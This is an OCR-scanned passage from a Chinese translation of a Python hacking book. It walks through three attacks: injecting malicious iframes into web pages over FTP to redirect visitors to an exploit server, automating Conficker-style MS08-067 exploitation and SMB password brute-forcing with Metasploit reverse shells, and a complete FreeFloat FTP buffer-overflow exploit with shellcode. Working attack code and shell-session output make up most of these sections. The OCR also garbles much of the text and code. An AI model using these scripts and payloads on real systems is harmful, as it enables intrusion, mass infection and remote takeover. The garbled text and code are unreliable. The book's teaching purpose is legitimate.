这 个 iframe 字符 串 。 然 后 下 载 该 网 页 的 临时 副本 。 接 着 ， 它 把 重 定向 到 我 们 恶意 服务 器 上 的 
这 个 iframe 添加 到 这 个 临时 文件 中 。 最 后 ， 函 数 将 被 感染 的 网 页 传 回 被 黑 的 服务 器 上 。 
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print '[+] Uploaded Injected Page: ' + page 
host = '192.168.95.179' ) 
userName = "guest! 
passWord = 'guest' 
MERA e, = ftplib.FTP (host) 
ftp.login (userName, passWord) 
redirect = '<iframe src='+\ 
‘http://10.10.10.112:8080/exploit"></iframe>' 
injectPage(ftp, ‘index.html', redirect) 


运行 代码 ， 可 以 看 到 它 下 载 了 index.htm 网 页 ， 并 在 其 中 注入 了 恶意 内 容 。 


attacker# python injectPage.py 

[+] Downloaded Page: index.html 

[+] Injected Malicious IFrame on: index.html 
[+] Uploaded Injected Page: index.html 


整合 全 部 的 攻击 


我 们 整个 的 攻击 将 以 attack0) 函 数 收 官 。attack0 函 数 的 输入 参数 包括 一 个 用 户 名 、 密 码 、 
主机 名 和 重 定 回 的 位 置 。 该 函数 首先 用 用 户 名 /密码 登录 FTP 服务 器 。 然 后 ， 这 个 脚本 会 搜索 
默认 网 页 。 脚 本 会 下 载 每 个 被 找到 的 网 页 ， 并 在 其 中 加 入 恶意 重 定向 代码 。 最 后 ， 脚 本 会 将 
被 挂 马 的 网 页 传 回 FTP 服务 器 ， 这 样 任 何 访问 该 Web 服务 器 的 机 器 都 将 会 被 黑 掉 。 

def attack(username, password, tgtHost, redirect): 

ftp =ftplib.FTP(tgtHost) | 
ftp.login(username, password) 
defPages =returnDefault (ftp) | 


for defPage in defPages: 
injectPage(ftp, defPage, redirect) 


通过 添加 一 些 命令 行 参数 的 解析 代码 ， 我 们 就 完成 了 整个 脚本 。 你 会 注意 到 : 我 们 首先 
会 看 FTP 服务 器 能 不 能 匿名 访问 。 如 果 不 能 ， 我 们 会 去 暴力 破解 口令 。 如 果 能 破解 出 口令 或 
FTP 能 匿名 登录 ， 我 们 就 会 登录 到 FTP 站 点 上 去 发 动 攻击 。 尽 管 只 用 了 数 百 行 代码 ， 但 它 完 
全 复制 了 k98Sytv 攻击 中 使 用 的 攻击 载体 。 

import ftplib i 

import optparse 

import time 

def anonLogin (hostname) : 
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对 某 个 有 漏洞 的 FTP 服务 器 运行 我 们 的 脚本 ， 可 以 看 到 ， 脚 本 尝试 匿名 登录 时 失败 ， 但 
暴力 破解 时 破解 出 了 用 户 名 /口令 对 : guest/guest， 然 后 脚本 下 载 了 FTP 根 目录 下 的 所 有 网 
页 ， 并 在 其 中 插入 了 恶意 代码 。 


在 确保 作为 重 定向 目标 的 攻击 服务 器 处 于 运行 状态 后 ， 我 们 只 需 守株待兔 即 可 。 很 快 ， 
10.10.10.107 访问 了 已 经 被 感染 的 Web 服务 器 ， 并 被 重 定 向 至 我 们 的 攻击 服务 器 。 成 功 ! 我 
们 通过 FTP 服务 感染 了 Web 服务 器 ， 并 借 此 获取 了 “ 肉 机 ”的 命令 行 shell。 
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[*] Exploit running as background job. 
[*] Started reverse handler on 10.10.10.112:443 
[*] Using URL:http://10.10.10.112: 8080/exploit 
[*] Server started. il 
msf exploit (ms10 002 _aurora) at 
[*] Sending Internet Tp "Aurora" Memory Corruption to client 
10.10.10.107 
[*] Sending stage (240 bytes) to 10.10.10.107 
[*] Command shell session 1 opened (10.10.10.112:443 -> 
~ 10.10.10.107:65507) at 2012-06-24 10:02:00 -0600 
msf exploit (ms10 002 aurora) > sessions -i 1 
[*] Starting interaction with 1... 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 
C:\Documents and Settings\Administrator\Desktop> 
虽然 ，k985ytv 只 是 传播 假 防 病毒 软件 的 犯罪 分 子 使 用 的 众多 手法 之 一 ， 但 它 确 实 成 功 地 
黑 掉 了 11000 个 疑似 感染 的 主机 中 的 2220 个 。 总 的 说 来 ， 截 至 2009 年 ， 这 种 假 防 病毒 软件 
COR Ss Bit 4300 万 人 的 信用 卡 信息 ， 而 且 这 个 数字 还 在 继续 增长 。 对 只 有 数 百 行 的 Python 
代码 来 说 ， 这 个 战绩 够 不 错 的 了 。 在 下 一 节 中 ， 我 们 将 再 做 一 个 可 以 黑 掉 200 个 国家 的 超过 


500 万 台 工 作 站 的 攻击 。 


Conficker， 为 什么 努力 做 就 够 了 


2008 年 11 月 下 旬 ， 计 算 机 安全 专家 被 一 个 很 有 意思 地 改变 了 游戏 规则 的 蚂 虫 病毒 惊醒 。 
Conficker (或 称 之 为 W32DownandUp) 的 传播 极为 迅速 ， 致 使 200 多 个 国家 里 的 500 万 台 计 
算 机 受到 了 感染 (Markoff, 2009) 。 虽 然 在 这 一 攻击 中 ， 一 些 先 进 的 方法 《诸如 数字 签名 、 
加 密 载 荷 ， 以 及 多 种 传播 方案 等 ) 也 参与 其 中 ， 但 在 Conficker 蠕虫 的 核心 中 ， 它 的 一 些 攻 击 
方法 与 1988 年 的 Morris 蠕虫 (Nahorney，2009) 颇具 相似 之 处 。 在 下 面 的 内 容 中 ， 我 们 将 重 
现 Conficker 蠕虫 的 主要 攻击 方法 。 

在 其 基本 的 感染 方法 中 ，Conficker 蠕虫 使 用 了 两 种 不 同 的 攻击 方法 。 首 先 ， 它 利用 了 
Windows 服务 器 中 一 个 服务 的 Oday 漏洞 。 利 用 这 个 栈 溢出 漏洞 ， 蠕 虫 能 在 被 感染 的 主机 上 执 
行 shellcode 并 下 载 蠕虫 。 当 这 种 攻击 失败 时 ，Conficker 旺 虫 又 党 试 暴 力 破解 默认 的 管理 员 网 
络 共享 (ADMINS$) 的 口令 以 获取 肉 机 访问 权 。 
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SE PI RENT 


密码 攻击 

在 进行 攻击 时 ，Conficker 使 用 的 口令 列表 里 有 超过 250 个 常用 密码 。 而 Morris 蠕 
忠 使 用 的 口令 列表 中 的 密码 数 为 432 个 。 下 面 这 11 个 常见 的 密码 在 这 两 个 极为 成 功 的 
病毒 使 用 的 密码 列表 中 都 出 现 了 。 在 编写 你 的 口令 列表 时 ， 这 11 个 口令 绝对 值得 你 拥 

è aaa 

e academia 

e anything 

e cofiee 

® computer 

è cookie 


® oracle 


® password 


è secret 

® super 

è unknown 

在 几 次 大 规模 的 攻击 波 中 ， 黑 客 会 在 网 上 发 布 一 些 密码 库 (password dump). % 
然 导 致 这 些 密码 泄露 的 行为 无 疑 是 非法 的 ， 但 这 些 密码 库 也 成 为 安全 专家 们 感 兴趣 的 
FIT HB. DARPA ( 美国 国防 部 高 级 研究 计划 局 ) 的 Cyber Fast Track 项 目 经 理 Peiter 
Zatko (又 名 Mudge) 就 曾 令 一 屋子 的 高 级 军官 汗颜 一 当时 他 问 他 们 的 密码 是 不 是 由 
两 个 大 写 单词 、 两 个 特殊 字符 和 两 个 数组 成 的 。 此 外 ，2011 年 6 Ain, KEUR 
LulzSec 曾 在 一 个 密码 库 中 公布 了 26000 名 用 户 的 密码 和 个 人 信息 。 在 撞 库 攻击 中 ， 
还 会 发 现 有 些 密码 会 被 同一 个 用 户 同 时 用 在 好 几 个 社交 网 站 中 。 然 而 ， 最 大 规模 的 攻 
击 要 数 以 八卦 爆料 著名 的 高 客 传媒 ( Gawker ) 的 倩 100 万 用 户 的 账户 和 密码 被 泄露 的 
那 次 。 





5 全 球 知名 的 新 闻 传 媒 类 博客 ，2010 年 12 月 ， 一 群 自 称 “ 灵 知 ”(Gnosis) 的 黑客 在 网 上 公布 了 一 个 50 
OMB 的 文件 ， 其 中 包括 130 万 高 客 传媒 注册 用 户 的 用 户 名 、 电 子 邮件 和 密码 等 信息 。 这 一 事件 也 被 
称 为 史上 最 惨烈 的 九 大 黑客 攻击 事件 之 一 。 
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使 用 Metasploit 攻 击 Windows SMB 服 务 


我 们 可 以 利用 Metasploit 框架 (可 至 http://metasploit.com/download/ 中 下 载 〉 简 化 我 们 的 
攻击 代码 。 作 为 一 个 开源 计算 机 安全 项 目 ，Metasploit 在 过 去 的 8 年 间 很 快 就 被 广泛 使 用 ， 并 
且 已 经 变 成 了 一 个 漏洞 利用 代码 的 开发 工具 包 。Metasploit 为 不 少 合法 的 漏洞 利用 代码 编写 者 
HIER, HAEHAA. Metasploit 能 让 渗透 测试 人 员 在 标准 化 和 脚本 化 的 环境 中 运行 数 以 
生计 的 不 同 的 计算 机 漏洞 利用 代码 。 在 Conficker 蠕虫 中 使 用 的 漏洞 曝光 后 不 久 ，HD Moore 
就 将 一 个 有 效 的 漏洞 利用 代码 整合 进 了 框架 内 一 一 MS08-067_netapi。 

虽然 攻击 者 可 以 通过 交互 驱动 的 方式 使 用 Metasploit， 但 Metasploit 也 能 读 取 批 处 理 脚 本 
Cro) 完成 攻击 。 在 攻击 时 ，Metasploit 会 顺序 执行 批 处 理 文件 中 的 命令 。 举 个 例子 ， 如 果 我 们 
要 使 用 ms08_067_netapi (Conficker) KERAMIK “AWL” (192.168.13.37) ， 使 之 与 我 们 自 
己 的 主机 192.168.77.77 的 7777 端口 建立 一 个 反 向 shell. 


use exploit/windows/smb/ms08_067_netapi 

set RHOST 192.168.1.37 

set PAYLOAD windows/meterpreter/reverse tcp 
set LHOST 192.168.77.77 

set LPORT 7777 

exploit -j -z 


在 使 用 Metasploit 进行 攻击 时 ， 首 先 选 好 要 用 的 漏洞 利用 代码 C exploit/windows/ 
smb/ms08 067 netapi) ， 并 将 目标 设置 为 192.168.1.37 。 选 定 目 标 后 ， 设 定 负 载 为 
windows/meterpreter/reverse _ tcp， 并 将 反 回 连接 的 目标 设 为 主机 192.168.77.77, Big OA 7777. 
最 后 ， 让 Metasploit 去 实施 攻击 。 将 上 面 这 些 代 码 保存 为 文件 confickerrc。 现 在 我 们 只 要 输 
入 命令 msfconsole -r confickerrc， 就 能 发 起 攻击 。 这 条 命令 让 Metasploit 运行 脚本 conficker.rc 
中 的 指令 。 如 果 攻 击 成 功 ， 会 返回 一 个 让 我 们 能 控制 目标 计算 机 的 Windows 命令 行 shell。 


attacker$S msfconsole -r conficker.rc 
= [*] Exploit running as background job. 
[*] Started reverse handler on 192.168.77.77:7777 
_[*] Automatically detecting the target... 
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English 
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX) | 
[*] Attempting to trigger the vulnerability... f 
[*] Sending stage (752128 bytes) to 192.168.1.37 — 
[*] Meterpreter session 1 opened (192.168.77.77:7777 -> 
~= :192.168.1.37:1087) at Fri Nov 11 15:35:05 -0700 2011 
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msf exploit (ms08 067 netapi) > sessions -i 1 
[*] Starting interaction with 1... 
meterpreter > execute -i -f cmd.exe 

Process 2024 created. 

Channel 1 created. 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 
C:\WINDOWS\system32> 


编写 Python 脚本 与 Metasploit 交 互 


Aes! 我 们 已 经 编写 了 一 个 Metasploit 脚本 ， 用 它 黑 掉 了 一 台 机 器 ， 并 获得 一 个 
shell。 但 是 在 254 台 主 机 上 重复 这 一 过 程 可 能 会 使 我 们 在 键入 配置 文件 上 人 花 太 多 的 时 间 ， 不 
过 如 果 我 们 再 次 使 用 Python 大 法 ， 就 可 以 快速 编写 一 个 能 扫描 出 所 有 打开 445 端口 的 主机 ， 
并 自动 生成 一 个 去 攻击 所 有 有 漏洞 主机 的 Metasploit 脚本 文件 的 Python 脚本 。 

首先 ， 让 我 们 再 次 使 用 上 一 个 端口 扫描 器 例子 中 的 Nmap-Python 模块 。 在 这 里 ， 
findTgts(0) 函 数 输 入 的 参数 是 一 个 要 扫描 的 主机 IP 地 址 〈 段 ) ， 返 回 所 有 开放 TCP 445 端口 的 
HL. TCP 445 端口 主要 是 作为 SMB 协议 的 默认 端口 用 的 。 通 过 过 滤 ， 只 留 下 开放 TCP 445 
端口 的 主机 ， 我 们 的 攻击 脚本 的 目标 就 只 有 这 些 攻 击 能 够 起 效 的 主机 了 。 这 一 过 滤 操 作 同 时 
也 会 把 那些 通常 会 阻塞 我 们 的 连接 企图 的 主机 也 消除 掉 。 函 数 会 逐一 扫描 所 有 的 主机 ， 一 旦 
发 现 某 台 机 主打 开 了 TCP (445) 端口 ， 就 会 把 该 主机 添加 到 一 个 数组 中 。 完 成 扫描 循环 后 ， 
该 函数 会 返回 到 这 个 含有 所 有 打开 了 TCP 445 端口 的 主机 的 数组 。 

import nmap 

def findTgts (subNet): 

nmScan = nmap. PortScanner () 
nmScan.scan(subNet, '445') 
tgtHosts = [] | 
for host in nmScan.all hosts(): 
if nmScan(host].has_tcp(445): 
state = nmScan[host]['tcp'] [445] ['state'] 
if state == "open’: 
print '[+] Found Target Host: ' + host 


tgtHosts.append (host) 
return tgtHosts 


接 下 来 ， 我 们 要 为 被 我 们 黑 掉 的 目标 编写 一 个 监听 器 。 这 个 监听 器 或 称 命令 与 控制 信道 
(command and control channel) ， 使 我 们 能 在 它 被 我 们 黑 掉 之 后 与 目标 主机 进行 远程 交互 。 
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Metasploit 提供 了 一 个 被 称 为 Meterpreter 的 高 级 的 动态 负载 。Metasploit 的 Meterpreter 在 远程 
机 器 上 运行 后 ， 会 主动 连接 我 们 的 指挥 控制 主机 ， 并 提供 大 量 分 析 和 控制 肉 机 的 函数 。 
Meterpreter 扩展 工具 包 中 还 提供 寻找 取证 对 象 、 发 布 命 令 、 通 过 肉 机 路 由 流量 、 安 装 键盘 记 
录 器 或 转 储 密 码 hash 的 能 力 。 

当 Meterpreter 进程 回 连接 到 攻击 者 的 计算 机 等 候 执 行进 一 步 的 命令 时 ， 我 们 要 使 用 一 个 
名 为 multi/handler 的 Metasploit 模块 去 发 布 命令 。 在 我 们 的 机 器 上 设置 multi/handler 监听 器 
时 ， 首 先 需要 把 各 条 指令 写 入 Metasploit 的 rc 脚本 中 。 请 留意 上 面 我 们 是 用 什么 命令 把 载 衔 
(PAYLOAD) 设置 为 reverse_tcp 连接 的 ， 然 后 又 是 用 什么 命令 设置 本 地 主机 IP 地 址 和 和 希望 收 
到 反 向 连接 的 端口 的 。 此 外 ， 我 们 还 增设 了 一 个 全 局 变量 DisablePayloadHandler， 这 个 全 局 变 
量 的 作用 是 : 我 们 已 经 新 建 了 一 个 监听 器 ， 此 后 所 有 的 主机 均 不 必 重 复 新 建 监 听 器 。 

def setupHandler (configFile, lhost, lport): 

configFile.write('use eet ne a ee ) 
configFile. write ("set PAYLOAD '+\ | 

eh ale _'windows/meterpreter/reverse_ tcp\n') 

 configFile. write('set LPORT ' + str(lport) + '\n') 
© O- gonfigFile.write('set LHOST ' + lhost + '\n') 


~ configFile.write('exploit -j -z\n') 
configFile.write("setg DisablePayloadHandler Xn! ) 


最 后 ， 当 脚本 能 够 在 目标 主机 上 执行 漏洞 利用 代码 时 ， 该 函数 将 向 Metasploit rc 脚本 中 和 写 
入 用 于 生成 漏洞 利用 代码 的 目标 主机 、 本 地 地 址 和 端口 。 该 函数 还 将 把 指定 使 用 哪个 漏洞 利用 
代码 的 指令 也 写 入 rc 脚本 的 文件 中 。 它 先 去 指定 使 用 ms08_067_netapi 这 个 漏洞 利用 代码 一 一 
也 就 是 
RHOST。 此 外 ， 它 还 要 设 定 Meterpreter 的 载荷 以 及 Meterpreter 所 需 的 本 机 地 址 (LHOST) 
和 端口 (LPORT) 。 最 后 ， 脚 本 发 送 了 一 条 指令 在 同一 个 任务 (job) 的 上 下 文 环境 中 〈-j) ， 
不 与 任务 进行 即时 交互 的 条 件 下 〈-z) 利用 对 目标 计算 机 上 的 漏洞 。 因 为 这 个 脚本 会 黑 卸 多 人 台 
目标 计算 机 ， 根 本 不 可 能 同时 与 这 些 被 黑 的 计算 机 交互 ， 所 以 脚本 中 必须 使 用 -j 和-z 参数 。 





‘def confickerExploit (configFile, tgtHost, lhost, lport): 
configFile.write('use exploit/windows/smb/ms08_ 067 _netapi\n') 
configFile.write('set RHOST ' +str(tgtHost) ENI ne? 

-configFile.write('set PAYLOAD '+\ 
'windows/meterpreter/reverse _ tep\n' ) | | | t 
configFile.write('set LPORT ' +str(lport) +'\n' T 
configFile. write (" set. PHOST: + lhost) +, uruk 
configFile.write('exploit -j -z\n") 
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暴力 破解 口令 ， 远 程 执 行 一 个 进程 


尽管 攻击 者 已 经 能 成 功 地 在 被 黑 的 主机 上 运行 ms08_067_netapi 漏洞 利用 代码 ， 但 防卫 者 
也 能 很 方便 地 通过 安装 最 新 的 安全 补丁 来 阻止 漏洞 利用 代码 被 执行 。 因 此 ， 我 们 的 脚本 还 需 
要 另 一 种 也 在 Conficker 蜂 虫 中 使 用 过 的 攻击 方法 。 它 需要 用 暴力 攻击 的 方式 破解 SMB 用 户 
名 /密码 ， 以 此 获取 权限 在 目标 主机 上 远程 执行 一 个 进程 (psexec) 。 输 入 smbBrute 函数 的 参 
XA: Metasploit 脚本 文件 、 目 标 主机 、 包 含 密码 列表 的 另 一 个 文件 ， 以 及 本 机 地 址 和 端口 。 
它 将 用 户 名 设 为 Windows 的 默认 管理 员 administrator， 然 后 打开 密码 列表 文件 。 对 文件 中 的 
每 个 密码 ， 函 数 都 会 生成 一 个 用 来 远程 执行 (psexec) 进程 的 Metasploit 脚本 。 如 果 某 个 用 户 
名 /密码 对 是 正确 的 ， 远 程 执 行进 程 的 代码 就 会 运行 回 连 一 个 命令 行 shell 到 攻击 者 本 机 地 址 及 
对 应 的 端口 。 






把 所 有 的 代码 放 在 一 起 ， 构 成 我 们 自己 的 Conficker 


将 这 些 放 在 一 起 ， 现 在 这 个 脚本 就 能 扫描 可 能 的 目标 ， 利 用 MS08_067 漏洞 ， 并 /或 通过 
暴力 猜测 密码 远程 执行 一 个 进程 。 最 后 ， 我 们 还 要 在 main(0) 函 数 中 添加 一 些 参数 解析 代码 ， 
然后 调用 刚才 编写 的 那些 函数 ， 以 完成 脚本 的 编写 。 完 整 的 脚本 如 下 : 


oi KS a J 
“i DIJ | 
’ 


~ 
_ 
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到 目前 为 止 ， 我 们 用 来 黑 掉 目标 主机 的 都 是 一 些 已 知 的 方法 。 但 是 ， 如 果 你 遇 到 的 是 一 
个 没有 已 知 漏洞 的 目标 ， 该 怎么 办 呢 ? 该 如 何 编写 自己 的 Oday 攻击 代码 ? 在 下 一 节 中 ， 我 们 
就 来 编写 一 个 我 们 自己 的 0day 攻击 脚本 。 
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[*] Attempting to trigger the vulnerability... 

[*] Sending stage (752128 bytes) to 192.168.1.37 - - 

[*] Meterpreter session 1 opened (192: 168.1,.3% 1337 => 
TIZ TOB A aa at Sat Jun 23 16: 25: 05 -0700 2012 

<..SNIPPED..> 

[*] Selected Target: Windows XP SP2 EEA (AlwaysOn NX) 

[*] Attempting to trigger the vulnerability.. 

[*] Sending stage (752128 bytes) for 10262 68.4 a 

[*] Meterpreter session 1 opened (192.168.1.3:1337 -> 
192.168.1.42:1094) at Sat Jun 23 15:25:09 -0700 2012 


编写 你 自己 的 0day 概 念 验证 代码 


上 一 节 和 Conficker 蠕虫 使 用 的 都 是 栈 洲 出 漏洞 。 虽 然 在 Metasploit 框架 的 工具 库 中 包含 
有 超过 800 个 各 不 相同 的 漏洞 利用 代码 ， 但 你 还 是 会 碰 到 必须 自己 编写 远程 漏洞 利用 代码 的 
那 一 刻 。 本 节 将 介绍 怎样 用 Python 简化 这 个 过 程 。 要 做 到 这 一 点 ， 就 得 先 搞 明 白 基 于 栈 的 组 
冲 区 洲 出 是 怎么 回 事 儿 。 

Morris 蠕虫 成 功 的 原因 在 某 种 程度 上 其 实 就 是 利用 了 Finger service ( US v. Morris &, 1991) 
中 的 一 个 基于 栈 的 缓冲 区 游 出。 此 类 漏洞 之 所 以 能 被 成 功利 用 ， 是 由 于 程序 没 能 过 滤 或 验证 
用 户 的 输入 。 虽 然 Morris 蜂 虫 这 个 基于 栈 缓冲 区 洲 出 攻击 是 在 1988 年 发 起 的 ， 但 至 少 在 
1996 年 ，Elias Levy (X4 Aleph One) 就 在 Phrack 杂志 上 发 表 了 影响 深远 的 论文 Smashing 
the Stack for Fun and Profit (1996 年 第 一 期 ) 。 如 果 你 不 熟悉 基于 栈 的 缓冲 区 洲 出 攻击 的 工作 
原理 ， 或 是 想 学 到 更 多 的 内 容 ， 可 以 参阅 Elias 的 论文 。 在 这 里 我 们 只 想 花 点 时 间 把 基于 栈 的 
缓冲 区 洲 出 攻击 的 关键 概念 说 清楚 。 


基于 栈 的 缓冲 区 溢出 攻击 


在 基于 栈 的 缓冲 区 洲 出 中 ， 未 经 检查 的 用 户 数据 会 履 盖 下 一 个 会 被 执行 的 指令 指针 
CEIP) 的 方式 控制 程序 的 执行 流 。 这 种 漏洞 利用 代码 会 直接 让 EP 寄存 器 指 疝 攻击 者 插入 的 
shellcode 上 的 某 个 位 置 。 一 系列 的 机 器 码 指令 〈 也 称 shellcode) 会 让 漏洞 利用 代码 在 目标 系 
统 中 添加 额外 的 用 户 ， 与 攻击 者 建立 一 个 网 络 连接 ， 或 是 下 载 一 个 独立 的 可 执行 文件 。 
Shellcode 的 大 小 几乎 是 没有 限制 的 ， 其 大 小 仅仅 取决 于 内 存 可 用 空间 的 大 小 。 

如 今 各 种 不 同 的 利用 不 同类 型 漏洞 的 方法 已 经 有 很 多 ， 而 基于 栈 的 缓冲 区 溢出 是 其 中 最 
基本 的 。 当 前 漏洞 利用 代码 的 数量 众多 ， 而 且 还 在 不 断 增 加 。2011 年 7 月 ， 我 的 一 个 熟人 就 
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发 布 了 一 个 PacketStorm FTP 服务 中 漏洞 的 利用 代码 (Freyman, 2011) 。 尽 管 漏洞 利用 的 开 
发 貌似 是 一 项 复杂 的 任务 ， 但 实际 上 攻击 代码 却 是 只 有 不 到 区 区 80 行 (其 中 还 包括 约 30 行 
的 shell 代码 ) 。 


添加 攻击 的 关键 元 素 


让 我 们 开始 编写 漏洞 利用 代码 中 的 关键 元 素 。 首 先 ， 我 们 在 shellcode 变量 中 写 入 用 
Metasploit 框架 生成 的 载荷 的 十 六 进 制 码 。 然 后 ， 在 overflow 变量 中 写 入 246 个 字母 “A” 
(十 六 进 制 值 是 \x41) 。 接 着 让 ret 变量 指向 kernel32.dll 中 的 一 个 含有 把 控制 流 直接 跳 转 到 栈 
顶部 的 指令 的 地 址 。 我 们 的 padding 变量 中 是 150 个 NOP 指令 。 这 就 构成 了 NOP 链 。 最 后 ， 
把 所 有 这 些 变量 组 合 在 一 起 形成 我 们 称 之 为 crash 的 变量 。 


更 多 信息 
利用 基于 栈 的 缓冲 区 溢出 的 基本 术语 


wh: 用 户 的 输入 长 度 超出 栈 中 对 它 最 大 长 度 的 预期 ， 即 分 配 的 内 存 大 小 。 

返回 地 址 : 用 于 直接 跳 转 到 栈 顶 部 的 4B 的 地 址 。 在 下 面 的 漏洞 利用 中 ， 我们 使 用 一 个 在 
kernel32.dll 中 某 条 JMP ESP 指令 的 地 址 (指针 的 长 度 为 4B) 。 

Padding: 在 shellcode 之 前 的 一 系列 NOP (EHE) 指令 ， 它 使 攻击 者 预 估 直 接 跳 转 到 那里 去 
的 地 址 时 ， 能 放宽 的 精度 要 求 。 只 要 它 跳 转 到 NOP 链 的 任意 地 方 ， 可 直接 滑 到 shellcode 那里 。 

shellcode: 一 小 段 用 汇编 语言 编写 的 机 器 码 。 在 下 面 的 例子 中 ， 我 们 用 Metasploit 框架 生成 


shellcode. 


shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4 
\x5d\x33\xc9" 
"\ xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4£" 
"\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\xle\xd6\xf8" 
"\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7" 
"\xdb\x70\xe2\x64\x1£\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5" 
"\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7e" 
"\x56\x22\x1c\x43\x22\x98\x1£\x94\x9a\x97\x68\x0c\x91\xf0" 
"\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49" 
"\x19\xe6\x91\x65\x%94\xf6\xd6\x42\x46\x8d\x2c\xbl\xfb\x96" 
"\xf6\xcb\x27\x1l2\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82" 
"\xce\x10\xc3\x86\xd1\xf5\x7£\xb2\x5a\xf£8\xaf\x32\x18\xdf£" 
"\x6b\xle\xfb\x7e\x2d\xfa\xaa\x7f£\x2d\xa2\x13\xda\x25\x41" 
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发 送 漏洞 利 用 代码 


使 用 Berkeley Socket API， 我 们 可 以 与 目标 主机 上 的 TCP 21 端口 创建 一 个 连接 。 如 果 成 

连接 ， 我 们 会 匿名 登录 主机 。 最 后 会 发 送 FTP 命令 “RETR”， 后 面 接 上 crash BR. AW 

受 影响 的 程序 无 法 正确 检查 用 户 输入 ， 这 一 操作 就 引发 了 基于 栈 的 缓冲 区 溢出 ， 它 会 覆盖 EIP 
寄存 器 ， 使 程序 直接 跳 转 到 shellcode 那里 ， 并 执行 它 。 
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汇总 得 到 完整 的 漏洞 利用 脚本 


这 些 放 在 一 起 ， 我 们 就 有 了 与 Craig Freyman 发 布 在 packet storm 上 最 初 的 漏洞 利用 程 
序 完 全 相同 的 漏洞 利用 脚本 。 





Python 绝技 : 运用 Python 成 为 顶级 黑客 


"\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a" 
"\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b" 
"\ xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a" 
"\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3" 
"\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbce\xb9\x64\x5b\xea" 
"\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7£\x0£\x60\xd6\xb8\xd8" 
"\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6" 
"\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea" 
"\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30" 
"\x11\xd0\x48\xf£3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53" 
"\*41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85" 
"\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7£\x2a\x86\x25" 
"\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10" 
"\xba\xle\x53\x31") 
#7C874413 FFE4 JMP ESP kernel32.dll 
ret = struct.pack('<L', 0x7C874413) 
padding = "\x90" * 150 
crash = "\x41" * 246 + ret + padding + shellcode 
print "y a 2 
[*] Freefloat FTP 1.0 Any Non Implemented Command Buffer Overflow\n\ 
[*] Author: Craig Freyman (@cdizz) \n\ 
[*] Connecting to "+target 
s = socket.socket (socket,AF INET, socket.SOCK STREAM) 
try: 

s.connect((target, 21)) 
except: 

print "[=] Connection to "“+target+" failed!" 
sys.exit (0) 
print "{*] Sending " + 'len(crash)' + " " + command +" byte crash..." 
s.send("USER anonymous\r\n") 
s.recv (1024) 
s.send("PASS \r\n") 
s.recv (1024) 
s.send(command +" " + crash + "\r\n") 
time.sleep (4) 


下 载 能 运行 在 Windows XP SP2 或 SP3 机 器 上 的 FreeFloat FTP 软件 之 后 ， 我 们 就 可 以 测 
WA Craig Freyman 的 漏洞 利用 代码 了 。 注 意 : 他 使 用 shellcode 绑 定 了 有 漏洞 的 目标 主机 上 的 
TCP 4444 端口 。 因 此 ， 我 们 会 运行 漏洞 利用 脚本 ， 并 用 netcat 实用 程序 连接 到 目标 主机 上 的 
4444 病 口 。 如 果 一 切 顺 利 ， 我 们 现在 就 能 获取 有 漏洞 的 目标 主机 上 的 命令 行 提示 符 。 
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attacker$ python freefloat2-overflow.py 192.168.1.37 PWND 
[*] Freefloat FTP 1.0 Any Non Implemented ‘Command Buffer pats ek 
[*] Author: Craig Freyman (@cdlzz) 
[*] Connecting to 192.168.1.37 
[*] Sending 768 PWND byte crash... 
attackerS nc 192.168.1.37 4444 
Microsoft Windows XP [Version 5.1.2600] 
- (C) Copyright 1985-2001 Microsoft Corp. 
C:\Documents and Settings\Administrator\Desktop\> 


本 草 小 结 


恭喜 你 ! 我 们 已 经 写 好 了 几 个 能 用 于 渗透 测试 的 属于 我 们 目 己 的 工具 。 首 先 编写 了 一 
我 们 自己 的 端口 扫描 器 ， 然 后 ， 探 讨 了 攻击 SSH. FTP 和 SMB 协议 的 方法 ， 最 后 用 Python 
编写 了 一 个 我 们 自己 的 0day 漏洞 利用 脚本 。 

在 渗透 测试 过 程 中 ， 你 很 有 可 能 要 通过 无 数 次 地 尝试 才能 完成 代码 的 编写 工作 。 我 们 已 
经 演示 了 一 些 根 据 我 们 自己 的 渗透 测试 要 求 ， 编 写 Python 脚本 时 所 必需 的 基础 知识 。 现 在 我 
们 对 Python 的 功能 有 了 进一步 了 解 ， 就 让 我 们 看 看 怎么 写 脚 本 来 帮助 我 们 调查 取证 吧 。 
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本 章 简介 : 

。 获取 Windows 注册 表 中 的 地 理 位 置信 息 

e 分 析 回 收 站 

。 检查 PDF 文件 和 微软 复合 文档 中 的 元 数据 

e 提取 Exif 元 数据 中 的 GPS 坐标 

。 检查 Skype 聊天 记录 

e 列 出 Firefox (AM) 浏览 器 数据 库 中 的 上 网 历史 记录 
